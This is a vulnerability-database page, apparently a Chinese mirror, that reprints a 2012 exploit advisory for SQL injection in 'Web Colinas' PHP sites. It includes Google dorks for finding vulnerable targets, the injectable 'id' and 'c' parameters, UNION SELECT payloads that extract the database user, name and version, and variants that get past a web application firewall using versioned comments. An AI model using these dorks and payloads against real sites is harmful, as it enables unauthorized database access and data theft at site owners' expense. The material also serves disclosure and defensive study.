Web Colinas SQL Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1046142 漏洞类型
发布时间 2012-11-17 更新时间 2012-11-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012110119
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Web Colinas Sql Injection Vulnerability
# Google Dork(1): intext:"Web Colinas" inurl:".php?id="
# Google Dork(2): intext:"Web Colinas" inurl:".php?c="
# Date: 16/11/2012
# Author: Sys32
# Email: tha.Sys32[at]gmail[dot]com
# Vendor: http://www.webcolinas.pt/
# Category: Webapp
# Tested on: Backtrack 5 r3
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# I. INFO.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The application is vulnerable to sql injection, allowing an attacker to gain full access to the database.
# Some injections need WAF bypass
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# II. EXPLOIT.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# http://127.0.0.1/vull-page.php?id=[Sql-Injection]
#
# http://127.0.0.1/Vull-page.php?c=[Sql-Injection]
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# III. EXPLOIT Example.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Injection:
#
# http://127.0.0.1/Vull-page.php?c=-3 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# http://127.0.0.1/vull-page.php?id=-3  union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# Injection + WAF Bypass:
#
# http://127.0.0.1/Vull-page.php?id=-3/*!20000union*/+/*!20000SelEct*/ 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# http://127.0.0.1/Vull-page.php?c=-3/*!20000union*/+/*!20000SelEct*/ 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# IV. Risk.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The security risk of the remote sql injection vulnerability is estimated as critical.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''